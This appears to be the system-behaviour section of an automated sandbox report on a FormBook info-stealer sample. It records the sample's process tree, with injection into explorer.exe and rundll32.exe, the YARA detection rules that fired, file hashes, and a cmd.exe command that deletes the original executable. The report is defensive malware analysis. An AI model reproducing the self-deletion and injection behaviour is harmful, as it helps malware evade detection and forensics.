                                                                            System Behavior

                                                                            Analysis Process: NdBLyH2h5d.exe PID: 5612 Parent PID: 5620

                                                                            General

                                                                            Start time:10:05:27
                                                                            Start date:12/04/2021
                                                                            Path:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0x400000
                                                                            File size:207111 bytes
                                                                            MD5 hash:3FEF6985AF0D52AB6701DF170096B504
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            Analysis Process: NdBLyH2h5d.exe PID: 6140 Parent PID: 5612

                                                                            General

                                                                            Start time:10:05:28
                                                                            Start date:12/04/2021
                                                                            Path:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0x400000
                                                                            File size:207111 bytes
                                                                            MD5 hash:3FEF6985AF0D52AB6701DF170096B504
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            Analysis Process: explorer.exe PID: 3388 Parent PID: 6140

                                                                            General

                                                                            Start time:10:05:32
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff714890000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Analysis Process: rundll32.exe PID: 6048 Parent PID: 3388

                                                                            General

                                                                            Start time:10:05:43
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                            Imagebase:0x300000
                                                                            File size:61952 bytes
                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:high

                                                                            Analysis Process: cmd.exe PID: 4228 Parent PID: 6048

                                                                            General

                                                                            Start time:10:05:48
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0xd70000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Analysis Process: conhost.exe PID: 5988 Parent PID: 4228

                                                                            General

                                                                            Start time:10:05:48
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6b2800000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >